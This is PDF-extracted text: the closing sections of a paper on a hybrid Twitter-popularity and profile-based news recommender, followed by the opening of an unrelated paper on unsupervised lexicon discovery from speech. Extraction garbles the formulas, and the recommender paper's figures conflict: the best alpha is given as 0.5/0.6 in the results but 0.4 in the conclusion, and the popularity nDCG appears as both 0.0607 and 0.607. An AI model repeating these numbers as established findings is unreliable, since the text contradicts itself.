reuse SOLR, querying with the Lucene index that stored the article category vectors with the user’s profile. Hybrid news recommender system The hybrid recommender module combines the weights provided by each of the previous two modules to produce a recommendation based on both the articles popularity to users everywhere and the article’s likely interest to the particular user. We first experimented with multiplying the two factors together. This module calculates a hybrid weight by combining the two scores. The hybrid weight for article i and user j is given by: Hybrid Wt1ij ¼ Popularity Wtj � Personal Wtij Next, we incorporate a tunable parameter, a, that controls how much each of the two components contributes. Hybrid Wt2ij ¼ � � Popularity Wtj þ 1 � �ð Þ � Personal Wtij When a is 0.0, only the Personalized_Wt contributes to the overall weight. As a increases from 0.0–1.0, the Popularity_Wt’s contribution increases and the Personalized_Wt’s Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 13/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ contribution decreases. Eventually, when a is 1.0, only the Popularity_Wt influences the ranking. Sample scenario We now include a sample scenario to illustrate how the various recommender systems work. Consider the following example consisting of six news articles collected from online news sites and seven recent tweets collected from Twitter. Assume that articles B1, B2, and B3 were related to business, article E4 is about entertainment, and that articles S5 and S6 were about sports. Furthermore, assume that these three categories are the only categories in the ontology and that the system’s goal is to recommend three articles to the user. Popularity-based recommender We will begin describing the popularity based recommendation system that recommends news articles based only on the number of tweets related to the articles. The news articles are indexed with the SOLR Lucene indexer and the tweets queried against that collection to identify the most relevant two articles for each tweet and the associated cosine similarity scores. The cosine similarity scores for each article are then accumulated to produce the Popularity_Wt for each article. Table 1 shows the top two cosine similarity scores for each tweet with respect to each article. The popularity based recommender would then accumulate the cosine similarity scores for each article and the resulting aggregated value is known as the Popularity_Wt for that article. The articles would be sorted by in decreasing order by Popularity_Wt as shown in Table 2. Table 1 Data set for the sample scenario. Article B1 Article B2 Article B3 Article E4 Article S5 Article S6 Tweet 1 0.6 0.7 Tweet 2 0.3 0.1 Tweet 3 0.5 0.9 Tweet 4 0.5 0.4 Tweet 5 0.2 0.2 Tweet 6 0.1 0.1 Tweet 7 0.1 0.3 Table 2 Popularity-based ranking of the articles. Article Popularity_Wt B1 1.4 E4 1.3 S6 1.0 B3 0.6 B2 0.5 S5 0.2 Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 14/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ The popularity-based news recommender system would thus produce the following recommendations, in order: Article B1, Article E4, and Article S6. Note the three recommendations are about three different topics, i.e., business, entertainment, and sports respectively. Profile-based recommender We will now discuss the profile-based news recommender system in more detail. The user first needs to manually create his/her profile based on his/her interests in various categories. For this simple example, assume that the user creates the profile shown in Table 3. The news articles in the collection are classified with using a kNN classifier. For each article, the classifier returns a weight for each category that represents the similarity between that category and the article. Table 4 summarizes the results of this classification, showing the weights for each article for the top two matching categories. The Personal_Wt for each article is then produced by calculating the dot product of the category vectors for each article with the category vector for the user profile. For example, the weight for Article B2 would be (6 � 0.7) in Business + (0 � 1) for Entertainment + (3 � 0.6) in Sports for a total weight of 6.0. The articles are then sorted in decreasing order by Personal_Wt. Table 5 shows the results of these calculations for this example. Table 3 User profile. Category Weight Business 6 Entertainment 1 Sports 3 Table 4 Articles and their category-match weights. Articles Business Wt Entertainment Wt Sports Wt B1 0.3 0.2 0.0 B2 0.7 0.0 0.6 B3 0.4 0.7 0.0 E4 0.0 8.0 0.2 S5 0.6 0.1 0.0 S6 0.4 0.1 0.0 Table 5 Profile-based ranking of the articles. Article Personal_Wt B2 6.0 S5 3.7 B3 3.1 S6 2.5 B1 2.0 E4 1.4 Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 15/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ The profile-based news recommender system would thus produce the following recommendations, in order: Article B2, Article S5, and Article B3. Note that two of the three recommended articles are business-related and the middle recommendation is about sports. This reflects the user’s interests as captured by their profile. Furthermore, the top recommendation is for article B2 versus B1 previously. B2 is a better match to the business category whereas B1 was much more popular on Twitter. Hybrid recommender We now continue our example using the set of articles in the previous examples to describe the hybrid recommendation system. The Popularity_Wt and Personal_Wt scores for each article are normalized and the Hybrid_Wt is the product of these normalized weights. Table 6 illustrates this process. The articles are then sorted by decreasing order by Hybrid_Wt to produce the final recommendations, as shown in Table 7. The hybrid news recommender system would thus produce the following recommendations, in order: Article B2, Article B1, and Article S6. Article B2 appears at the top because it is such a strong match for the user’s most highly weighted profile category. Articles B1 and S6 appear because they are moderate matches for the user’s profile and also quite popular on Twitter, illustrating the effects of the hybrid recommender. EVALUATION This section describes the experiments that we conducted to evaluate the accuracy of the recommendations based on popularity, user profile, and the hybrid recommendations. All experiments were conducted on the same collection of news articles 280 news articles collected from CNN and BBC and 202,224 tweets collected from Twitter on the same day. Table 6 Hybrid ranking of the articles. Article Popularity_Wt Normalized Popularity_Wt Personal_Wt Normalized Personal_Wt B1 1.4 1.00 2 0.33 B2 0.5 0.36 6 1.00 B3 0.6 0.43 3.1 0.52 E4 1.3 0.93 1.4 0.23 S5 0.2 0.14 3.7 0.62 S6 1.0 0.71 2.5 0.42 Table 7 Hybrid ranking of the articles. Article Hybrid_Wt B2 0.36 B1 0.33 S6 0.30 B3 0.22 E4 0.22 S5 0.09 Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 16/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ We collected 40 news articles for each of 7 topics (Sports, Crime, Business, Politics, Tech, Health and Entertainment). The results reported here were produced using 27 volunteer test subjects. To evaluate the relative importance of global popularity versus individual interest in a story, we varied a from 0.0–1.0 in increments of 0.1, a total of 11 values. The profiles-based recommender system alone constitutes our baseline approach, that is, we compared both the popularity-based recommender system and the hybrid recommender system to that baseline. Evaluating matching tweets to articles In our popularity-based recommender, the popularity of the news articles is determined with the help of the tweets from the Twitter’s public timeline. A key component of that recommender is the ability to associate tweets from Twitter with news articles, thus being able to identify those articles being talked about the most on the blogosphere. The goal of this experiment is to determine whether or not we can accurately match a tweet with a related news article so that we can build our popularity-based recommender around that tweet/news article-matching component. To evaluate the accuracy of the SOLR-provided tweet/article matches, we have selected five tweets from each of the seven news categories as test tweets (35 test tweets total). We randomly selected five tweets from the tweets database that were good matches for the categories in our news article database. Each test tweet was queried against the SOLR Apache server to retrieve the top matching news articles. For each tweet’s result set, we examined the category associated with each of the top five articles. For each of those articles, we examined the category associatedwith the article and comparedthat article with thecategory associated with the tweet to judge the accuracy of our tweet/article matching module. The results of our evaluation are shown in Fig. 5. Overall, we have 88% accuracy in the top 5 articles matched against a tweet. That is, 88% of the time, the articles retrieved in response to a given tweet match the category to which the tweet is related. Our best performance is with Sports related tweets (96%) and the worst is with Health (76%). Evaluating the hybrid recommender Each volunteer test subject was presented with a web page on which they entered weights from 0–10 indicating their personal interest each of the seven categories. The users entered the weights such they totaled to 10. These category/weight pairs form their user profile. We essentially have two baselines to which we compare our hybrid recommender system, a purely conceptual, personalized recommender system and a purely popularity-based recommender system. These are incorporated into our evaluation of Hybrid_Wt2, i.e., when a is 0, only the Personal_Wt contributes to the score, so we get purely profile-based recommendations. Similarly, when a is 1, only Popularity_Wt contributes to the score, so the user receives purely popularity-based recommendations. For the articles retrieved by Hybrid_Wt1 and each of the 11 values of a for Hybrid_Wt2, evaluated, we calculated the weight of each article in our collection and sorted the articles by weight. We stored the ArticleID, the Hybrid_Wt, and rank for the top 10 articles. Thus, each subject had 12 sets of 10 documents to judge. Different values of a bring new Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 17/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ articles to the top but they also rearrange the ordering of articles that appear in other result sets. Although subjects could potentially be asked to judge 120 articles, the average number of unique articles judged by the subjects was 45. To avoid user fatigue and gather consistent feedback, each article was presented to be judged only once, and that judgment used to evaluate all the result sets in which the article appeared. In order to avoid bias, we randomized the order of presentation of the news articles to the user. Thus, they did not know which system(s) recommended the news articles or where the articles were ranked originally. The users were asked to rate each article recommended as very interesting, interesting, or not interesting. Once the user finishes rating all the articles, information such as profile, the article’s strategy, rank, weight and the user’s rating were logged into a file for analysis. Results We evaluated our recommender systems using the normalized Discounted Cumulative Gain at top k (nDCG@k), a widely used metric for rank ordered lists. We analyzed the results of 14 users who completed the evaluation of the top 10 documents for each method. With that metric, Hybrid_Wt1 produces a nDCG@10 of 0.616. Our next task is to tune Hybrid_Wt2 to identify the best performing value for a so that we can compare our two hybrid approaches. The nDCG@10 over all users as alpha is varied from 0 (pure personalized) to 1 (pure popularity) in steps of 0.1 is depicted graphically in Fig. 6. The worst performance, 0.601, arises when the popularity measure dominates the ratings is considered (a = 0.9). When only the Popularity_Wt is used, the nDCG is quite low, 0.0607. In contrast, when the only user’s profile is considered (a = 0.0), we achieve an nDCG of 0.643. Our results show that as measured by the nDCG metric, both a = 0.5 and a = 0.6 outperform all other a values tied with an nDCG of 0.668. These results indicate that the 0 10 20 30 40 50 60 70 80 90 100 A cc u ra cy Figure 5 Accuracy of tweet/category matching. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 18/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ most relevant articles are those that are selected using a relatively equal combination mixture of their interests and general public’s interests. Table 8 contains a comparison of both hybrid approaches to the baselines of purely personal and purely popular recommendations. Overall, Hybrid_Wt2 with a = 0.5 outperforms Hybrid_Wt1 by 7.8%, Personal_Wt by 2.4%, and Popularity_Wt by 6.0%. We performed a paired two-tailed student’s t-test analysis and confirmed that the Hybrid_Wt2 improvement versus the Personal_Wt was statistically significant (p = 0.002857). Similarly, the Hybrid_Wt2 improvement versus the Popularity_Wt was statistically significant (p = 0.000049) as was the improvement of Hybrid_Wt2 over Hybrid_Wt1 (p = 0.04512). CONCLUSION In this paper, we presented the design and implementation of a news recommender system that incorporates a novel approach to recommend interesting news articles to the user. We implemented four different strategies to recommend news articles to the user that are interesting to read. We have evaluated each of the strategies by comparing them to our baseline approach which is the personal recommender system. We found that: 1. Both hybrid approaches outperform the popularity and personal recommendations. 2. The personal recommender provides better recommendations than the popularity- based recommender. 3. The tunable hybrid algorithm with a = 0.4 provided the best overall performance. 0.5 0.55 0.6 0.65 0.7 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 n D C G @ 10 α Value Figure 6 Evaluating Hybrid_Wt2: nDCG@10 versus a. Table 8 nDCG@10 per approach. Personal (a = 0) Popularity (a = 1) Hybrid_Wt1 Hybrid_Wt2 (a = 0.5) nDCG@10 0.643 0.607 0.616 0.668 Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 19/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ We can extend this work in several ways. In particular, the accuracy of our news recommender system can be improved by considering other features such as location or temporal activity. Also, our users provided explicit feedback about the categories in which they were interested. The recommender system could be improved by implicitly inferring the users’ interests based on their reading habits. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Susan Gauch is an Academic Editor for PeerJ Computer Science. Author Contributions � Nirmal Jonnalagedda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Susan Gauch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper, submitted manuscript for publication. � Kevin Labille wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, updated literature review. � Sultan Alfarhood analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. Data Deposition The following information was supplied regarding data availability: The raw data includes human subjects information that cannot be shared. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.63#supplemental-information. REFERENCES Abel F, Gao Q, Houben GJ, Tao K. 2011. Analyzing user modeling on twitter for personalized news recommendations. User Modeling, Adaption and Personalization. Berlin, Heidelberg: Springer, 1–12. Balabanovic M, Shoham Y. 1997. Fab: content-based, collaborative recommendation. Communications of the ACM. New York: ACM, 66–72. Billsus D, Pazzani MJ. 1999. A personal news agent that talks, learns and explains. In: Proceedings of the Third Annual Conference of Autonomous Agents, New York: ACM Press, 268–275. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 20/22 http://dx.doi.org/10.7717/peerj-cs.63#supplementalnformation http://dx.doi.org/10.7717/peerj-cs.63#supplementalnformation http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Das AS, Datar M, Garg A, Rajaram S. 2007. Google news personalization: scalable online collaborative filtering. In: Proceedings of the Sixteenth International Conference on World Wide Web, New York, NY, USA, 271–280. Esparza SG, O’Mahony MP, Smyth B. 2010. On the real-time web as a source of recommendation knowledge. In: Proceedings of the Fourth ACM Conference on Recommender Systems, RecSys 2010, Barcelona, Spain, 26–30 September, New York: ACM, 305–308. Gauch S, Ravindran D, Chandramouli A. 2010. KeyConcept: conceptual search and pruning exploiting concept relationships. Journal of Intelligent Systems 19(3):265–288 DOI 10.1515/JISYS.2010.19.3.265. Gong S. 2010. A collaborative filtering recommendation algorithm based on user clustering and item clustering. Journal of Software 5(7):745–752 DOI 10.4304/jsw.5.7.745-752. Hill W, Stead L, Rosenstein M, Furnas G. 1995. Recommending and evaluating choices in a virtual community of use. In: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, New York: ACM Press/Addison-Wesley Publishing Co., 194–201. Jackoway A, Samet H, Sankaranarayanan J. 2011. Identification of live news events using Twitter. In: Proceedings of the Third ACM SIGSPATIAL International Workshop on Location-Based Social Networks, New York, NY, USA. New York: ACM, 25–32. Kang N, Doornenbal M, Schijvenaars B. 2015. Elsevier journal finder: recommending journals for your paper. In: Proceedings of the Ninth ACM Conference on Recommender Systems, New York: ACM, 261–264. Koren Y. 2010. Factor in the neighbors: scalable and accurate collaborative filtering. ACM Transactions in Knowledge Discovery from Data (TKDD) 4(1):Article 1 DOI 10.1145/1644873. Krulwich B, Burkey C. 1996. Learning user information interests through extraction of semantically significant phrases. In: Proceedings of the AAAI Spring Symposium on Machine Learning in Information Access. Palo Alto: AAAI Press, 100–112. Lang K. 1995. NewsWeeder: learning to filter netnews. In: Proceedings of the Twelfth International Conference on Machine Learning. San Francisco: Morgan Kaufmann, 331–339. Li L, Zheng L, Yang F, Li T. 2014. Modeling and broadening temporal user interest in personalized news recommendation. Expert Systems with Applications 41(7):3168–3177 DOI 10.1016/j.eswa.2013.11.020. Li X, Cong G, Li XL, Pham TAN, Krishnaswamy S. 2015. Rank-GeoFM: a ranking based geographical factorization method for point of interest recommendation. In: Proceedings of the 38th International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 433–442. McNee M, Albert I, Cosley D, GopalKrishnan P, Lam KS, Rashid MA, Konstan AJ, Riedl J. 2002. On the recommending of citations for research papers. In: Proceedings of the 2002 ACM Conference on Computer Supported Cooperative Work, New York, NY, USA. New York: ACM, 116–125. Mooney RJ, Roy L. 2000. Content-based book recommending using learning for text categorization. In: Proceedings of the Fifth ACM Conference on Digital Libraries, New York, NY, USA. New York: ACM, 195–204. Oh KJ, Lee WJ, Lim CG, Choi HJ. 2014. Personalized news recommendation using classified keywords to capture user preference. In: Proceedings of the Sixteenth International Conference on Advanced Communication Technology, 16–19 Feb. Piscataway: IEEE, 1283–1287. Pazzani M, Muramatsu J, Billsus D. 1996. Syskill & Webert: identifying interesting web sites. In: Proceedings of the Thirteenth National Conference on Artificial Intelligence. Palo Alto: AAAI Press, 54–61. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 21/22 http://dx.doi.org/10.1515/JISYS.2010.19.3.265 http://dx.doi.org/10.4304/jsw.5.7.745-752 http://dx.doi.org/10.1145/1644873 http://dx.doi.org/10.1016/j.eswa.2013.11.020 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Phelan O, McCarthy K, Bennett M, Smyth B. 2011a. On using the real-time web for news recommendation & discovery. In: Proceedings of the Twentieth International Conference Companion on World Wide Web, Hyderabad, India, 28 March–1 April. Phelan O, McCarthy K, Bennett M, Smyth B. 2011b. Terms of a feather: content-based news recommendation and discovery using Twitter. In: Proceedings of the Thirty-Third European Conference on Advances in Information Retrieval. Berlin, Heidelberg: Springer. Phelan O, McCarthy K, Smyth B. 2009. Using Twitter to recommend real-time topical news. In: Proceedings of the Third ACM Conference on Recommender Systems, New York, NY, USA, 23–25 October. New York: ACM, 385–388. Resnick P, Iacovou N, Suchak M, Bergstrom P, Riedl J. 1994. GroupLens: an open architecture for collaborative filtering of netnews. In: Proceedings of the ACM Conference on Computer-Supported Cooperative Work, Chapel Hill, NC. New York: ACM, 175–186. Sarwar B, Karypis G, Konstan J, Riedl J. 2001. Item-based collaborative filtering recommendation algorithms. In: Proceedings of the Tenth International Conference on World Wide Web, 285–295. Shiwen Y, Baoli L, Qin L. 2004. An adaptive k-nearest neighbor text categorization strategy. Journal of ACM Transactions on Asian Language Information Processing (TALIP) 3(4):215–226 DOI 10.1145/1039621.1039623. Su X, Khoshgoftaar TM. 2009. A survey of collaborative filtering techniques. Advances in Artificial Intelligence 2009:19 DOI 10.1155/2009/421425. Tkalcic M, Odic A, Kosir A, Tasic J. 2013. Affective labeling in a content-based recommender system for images. IEEE Transactions on Multimedia 15(2):391–400 DOI 10.1109/TMM.2012.2229970. Tuzhilin A, Adomavicius G. 2005. Toward the next generation of recommender systems: a survey of the state-of-the-art and possible extensions. IEEE Transactions on Knowledge and Data Engineering. Piscataway: IEEE, 734–749. Yu H, Zhang F. 2012. Collaborative filtering recommender system in adversarial environment. In: 2012 International Conference on Machine Learning and Cybernetics (ICMLC) 15–17 July. Piscataway: IEEE. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 22/22 http://dx.doi.org/10.1145/1039621.1039623 http://dx.doi.org/10.1155/2009/421425 http://dx.doi.org/10.1109/TMM.2012.2229970 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Incorporating popularity in a personalized news recommender system Introduction Literature Review Approach Evaluation Conclusion References work_pa2cgjgwrnepbdm4hnu6xpauc4 ---- Unsupervised Lexicon Discovery from Acoustic Input Chia-ying Lee1, Timothy J. O’Donnell2, and James Glass1 1Computer Science and Artificial Intelligence Laboratory 2Department of Brain and Cognitive Sciences Massachusetts Institute of Technology Cambridge, MA 02139, USA Abstract We present a model of unsupervised phono- logical lexicon discovery—the problem of simultaneously learning phoneme-like and word-like units from acoustic input. Our model builds on earlier models of unsuper- vised phone-like unit discovery from acous- tic data (Lee and Glass, 2012), and unsuper- vised symbolic lexicon discovery using the Adaptor Grammar framework (Johnson et al., 2006), integrating these earlier approaches us- ing a probabilistic model of phonological vari- ation. We show that the model is competi- tive with state-of-the-art spoken term discov- ery systems, and present analyses exploring the model’s behavior and the kinds of linguis- tic structures it learns. 1 Introduction One of the most basic problems of language acqui- sition is accounting for how children learn the in- ventory of word forms from speech—phonological lexicon discovery. In learning a language, children face a number of challenging, mutually interdepen- dent inference problems. Words are represented in terms of phonemes, the basic phonological units of a language. However, phoneme inventories vary from language to language, and the underlying phonemes which make up individual words often have variable acoustic realizations due to systematic phonetic and phonological variation, dialect differences, speech style, environmental noise, and other factors. To learn the phonological form of words in their lan- guage children must determine the phoneme inven- tory of their language, identify which parts of the acoustic signal correspond to which phonemes— while discounting surface variation in the realiza- tion of individual units—and infer which sequences of phonemes correspond to which words (amongst other challenges). Understanding the solution to this complex joint- learning problem is not only of fundamental sci- entific interest, but also has important applications in Spoken Language Processing (SLP). Even set- ting aside additional grammatical and semantic in- formation available to child learners, there is still a sharp contrast between the type of phonological learning done by humans and current SLP meth- ods. Tasks that involve recognizing words from acoustic input—such as automatic speech recogni- tion and spoken term discovery—only tackle parts of the overall problem, and typically rely on linguistic resources such as phoneme inventories, pronuncia- tion dictionaries, and annotated speech data. Such resources are unavailable for many languages, and expensive to create. Thus, a model that can jointly learn the sound patterns and the lexicon of a lan- guage would open up the possibility of automati- cally developing SLP capabilities for any language. In this paper, we present a first step towards an unsupervised model of phonological lexicon discov- ery that is able to jointly learn, from unannotated speech, an underlying phoneme-like inventory, the pattern of surface realizations of those units, and a set of lexical units for a language. Our model builds on earlier work addressing the unsupervised discov- ery of phone-like units from acoustic data—in par- ticular the Dirichlet Process Hidden Markov Model (DPHMM) of Lee and Glass (2012)—and the un- 389 Transactions of the Association for Computational Linguistics, vol. 3, pp. 389–403, 2015. Action Editor: Eric Fosler-Lussier. Submission batch: 11/2014; Revision batch 2/2015; Published 7/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. supervised learning of lexicons from unsegmented symbolic sequences using the Adaptor Grammar (AG) framework (Johnson et al., 2006; Johnson and Goldwater, 2009a). We integrate these models with a component modeling variability in the surface re- alization of phoneme-like units within lexical units. In the next section, we give an overview of re- lated work. Following this, we present our model and inference algorithms. We then turn to prelimi- nary evaluations of the model’s performance, show- ing that the model is competitive with state-of-the- art single-speaker spoken term discovery systems, and providing several analyses which examine the kinds of structures learned by the model. We also suggest that the ability of the system to successfully unify multiple acoustic sequences into single lexical items relies on the phonological-variability (noisy channel) component of the model—demonstrating the importance of modeling symbolic variation in phonological units. We provide preliminary evi- dence that simultaneously learning sound and lexi- cal structure leads to synergistic interactions (John- son, 2008b)—the various components of the model mutually constrain one another such that the linguis- tic structures learned by each are more accurate than if they had been learned independently. 2 Related Work Previous models of lexical unit discovery have pri- marily fallen into two classes: models of spoken term discovery and models of word segmentation. Both kinds of models have sought to identify lexi- cal items from input without direct supervision, but have simplified the joint learning problem discussed in the introduction in different ways. Spoken Term Discovery Spoken term discovery is the problem of using unsupervised pattern discov- ery methods to find previously unknown keywords in speech. Most models in this literature have typi- cally made use of a two-stage procedure: First, sub- sequences of the input that are similar in an acoustic feature space are identified, and, then clustered to discover categories corresponding to lexical items (Park and Glass, 2008; Zhang and Glass, 2009; Zhang et al., 2012; Jansen et al., 2010; Aimetti, 2009; McInnes and Goldwater, 2011). This prob- lem was first examined by Park and Glass (2008) who used Dynamic Time Warping to identify sim- ilar acoustic sequences across utterances. The in- put sequences discovered by this method were then treated as nodes in a similarity-weighted graph, and graph clustering algorithms were applied to produce a number of densely connected groups of acoustic sequences, corresponding to lexical items. Building on this work, Zhang and Glass (2009) and Zhang et al. (2012) proposed robust features that allowed lexical units to be discovered from spoken docu- ments generated by different speakers. Jansen et al. (2010) present a similar framework for finding re- peated acoustic patterns, based on line-segment de- tection in dotplots. Other variants of this approach include McInnes and Goldwater (2011) who com- pute similarity incrementally, and Aimetti (2009) who integrates a simplified, symbolic representation of visual information associated with each utterance. Word Segmentation In contrast to spoken term discovery, models of word (or morpheme) segmen- tation start from unsegmented strings of symbols and attempt to identify subsequences corresponding to lexical items. The problem has been the focus of many years of intense research, and there are a large variety of proposals in the literature (Harris, 1955; Saffran et al., 1996a; Harris, 1955; Olivier, 1968; Saffran et al., 1996b; Brent, 1999b; Frank et al., 2010; Frank et al., 2013). Of particular interest here are models which treat segmentation as a sec- ondary consequence of discovering a compact lexi- con which explains the distribution of phoneme se- quences in the input (Cartwright and Brent, 1994; Brent, 1999a; Goldsmith, 2001; Argamon et al., 2004; Goldsmith, 2006; Creutz and Lagus, 2007; Goldwater et al., 2009; Mochihashi et al., 2009; El- sner et al., 2013; Neubig et al., 2012; Heymann et al., 2013; De Marcken, 1996c; De Marcken, 1996a). Recently, a number of such models have been intro- duced which make use of Bayesian nonparametric distributions such as the Dirichlet Process (Fergu- son, 1973) or its two-parameter generalization, the Pitman-Yor Process (Pitman, 1992), to define a prior which favors smaller lexicons with more reusable lexical items. The first such models were proposed in Goldwater (2006) and, subsequently, have been extended in a number of ways (Goldwater et al., 2009; Neubig et al., 2012; Heymann et al., 2013; 390 Mochihashi et al., 2009; Elsner et al., 2013; John- son et al., 2006; Johnson and Demuth, 2010; John- son and Goldwater, 2009b; Johnson, 2008a; John- son, 2008b). One important lesson that has emerged from this literature is that models which jointly represent mul- tiple levels of linguistic structure often benefit from synergistic interactions (Johnson, 2008b) where dif- ferent levels of linguistic structure provide mutual constraints on one another which can be exploited simultaneously (Goldwater et al., 2009; Johnson et al., 2006; Johnson and Demuth, 2010; Johnson and Goldwater, 2009b; Johnson, 2008a; Börschinger and Johnson, 2014; Johnson, 2008b). For example, Elsner et al. (2013) show that explicitly modeling symbolic variation in phoneme realization improves lexical learning—we use a similar idea in this paper. An important tool for studying such synergies has been the Adaptor Grammars framework of John- son et al. (2006). Adaptor Grammars are a gen- eralization of Probabilistic Context-free Grammars (PCFGs) which allow the lexical storage of com- plete subtrees. Using Adaptor Grammars, it is pos- sible to learn lexica which contain stored units at multiple levels of abstraction (e.g., phonemes, on- sets, codas, syllables, morphemes, words, and multi- word collocations). A series of studies using the framework has shown that including such additional structure can markedly improve lexicon discovery (Johnson et al., 2006; Johnson and Demuth, 2010; Johnson and Goldwater, 2009b; Johnson, 2008a; Börschinger and Johnson, 2014; Johnson, 2008b). Unsupervised Lexicon Discovery In contrast to models of spoken term discovery and word segmen- tation, our model addresses the problem of jointly inferring phonological and lexical structure directly from acoustic input. Spoken term discovery sys- tems only attempt to detect keywords, finding lex- ical items that are isolated and scattered throughout the input data. They do not learn any intermediate levels of linguistic structure between the acoustic in- put and discovered lexical items. In constrast, our model attempts to find a complete segmentation of the input data into units at multiple levels of abstrac- tion (e.g., phonemes, syllables, words, etc.). Un- like word segmentation models, our model works directly from speech input, integrating unsupervised acoustic modeling with an an approach to symbolic lexicon discovery based on adaptor grammars. Although some earlier systems have examined various parts of the joint learning problem (Bac- chiani and Ostendorf, 1999; De Marcken, 1996b), to our knowledge, the only other system which ad- dresses the entire problem is that of Chung et al. (2013). There are two main differences between the approaches. First, in Chung et al. (2013), word- like units are defined as unique sequences of sub- word-like units, so that any variability in the real- ization of word-parts must be accounted for by the acoustic models. In contrast, we explicitly model phonetic variability at the symbolic level, allowing our system to learn low-level units which tightly predict the acoustic realization of phonemes in par- ticular contexts, while still ignoring this variabil- ity when it is irrelevant to distinguishing lexical items. Second, while Chung et al. (2013) employ a fixed, two-level representation of linguistic struc- ture, our use of adaptor grammars to model sym- bolic lexicon discovery means that we can easily and flexibly vary our assumptions about the hierarchi- cal makeup of utterances and lexical items. In this paper, we employ a simple adaptor grammar with three-levels of hierarchical constituency (word-like, sub-word-like, and phone-like units) and with right- branching structure; future work could explore more articulated representations along the lines of John- son (2008b). 3 Model 3.1 Problem Formulation and Model Overview Given a corpus of spoken utterances, our model aims to jointly infer the phone-like, sub-lexical, and lex- ical units in each spoken utterance. To discover these hierarchical linguistic structures directly from acoustic signals, we divide the problem into three sub-tasks: 1) phone-like unit discovery, 2) variabil- ity modeling, and 3) sub-lexical and lexical unit learning. Each of the sub-tasks corresponds to cer- tain latent structures embedded in the speech data that our model must identify. Here we briefly dis- cuss the three sub-tasks as well as the latent vari- ables associated with each, and provide an overview on the proposed model for each sub-task. 391 Figure 1: (a) An overview of the proposed model for inducing hierarchical linguistic structures directly from acoustic signals. As indicated in the graph, the model leverages partial knowledge learned from each level to drive discovery in the others. (b) An illustration of an input example, xi, and the associated latent structures in the acoustic signals di,ui,oi,~vi,zi. These latent structures can each be discovered by one of the three components of the model as specified by the red horizontal bars between (a) and (b). Phone-like unit discovery For this sub-task, the model converts the speech input xi into a sequence of Phone-Like Units (PLUs), ~vi, which implic- itly determines the phone segmentation, zi, in the speech data as indicated in (iv)-(vi) of Fig 1-(b). We use xi = {xi,t|xi,t ∈ R39,1 ≤ t ≤ Ti} to denote the series of Mel-Frequency Cepstral Coefficients (MFCCs) representing the ith utterance (Davis and Mermelstein, 1980), where Ti stands for the total number of feature frames in utterance i. Each xi contains 13-dimensional MFCCs and their first- and second-order time derivatives at a 10 ms frame rate. Each xi is also associated with a binary variable zi,t, indicating whether a PLU boundary exists between xi,t and xi,t+1. The feature vectors with zi,t = 1 are highlighted by the dark blue bars in Fig. 1-(vi), which correspond to segment boundaries. Each speech segment is labelled with a PLU id vi,j,k ∈ L, in which L is a set of integers that rep- resent the PLU inventory embedded in the speech corpus. We denote the sequence of PLU ids asso- ciated with utterance i using ~vi as shown in Fig. 1- (iv), where ~vi = {vi,j|1 ≤ j ≤ Ji} and vi,j = {vi,j,k|vi,j,k ∈ L,1 ≤ k ≤ |vi,j|}. The variable Ji is defined in the discussion of the second sub-task. As depicted in Fig. 1-(a), we construct an acoustic model to approach this sub-problem. The acoustic model is composed of a set of Hidden Markov Mod- els (HMMs), π, that are used to infer and model the PLU inventory from the given data. Phonological variability modeling In conversa- tional speech, the phonetic realization of a word can easily vary because of phonological and phonetic context, stress pattern, etc. Without a mechanism that can map these speech production variations into a unique representation, any model that induces lin- guistic structures based on phonetic input would fail to recognize these pronunciations as instances of the same word type. We exploit a noisy-channel model to address this problem and design three edit opera- tions for the noisy-channel model: substitute, split, and delete. Each of the operations takes a PLU as an input and is denoted as sub(u), split(u), and del(u) respectively. We assume that for every inferred se- quence of PLUs ~vi in Fig. 1-(b)-(iv), there is a cor- responding series of PLUs, ui = {ui,j|1 ≤ j ≤ Ji}, in which the pronunciations for any repeated word in ~vi are identical. The variable Ji indicates the length of ui. By passing each ui,j through the noisy- channel model, which stochastically chooses an edit operation oi,j for ui,j, we obtain the noisy phonetic realization vi,j.1 The relationship among ui, oi, and ~vi is shown in (ii)-(iv) of Fig. 1-(b). For notation simplicity, we let oi,j encode ui,j and vi,j, which means we can read ui,j and vi,j directly from oi,j. We refer to the units that are input to the noisy- channel model ui as “top-layer” PLUs and the units that are output from the noisy-channel model ~vi as “bottom-layer” PLUs. 1We denote vi,j as a vector since if a split 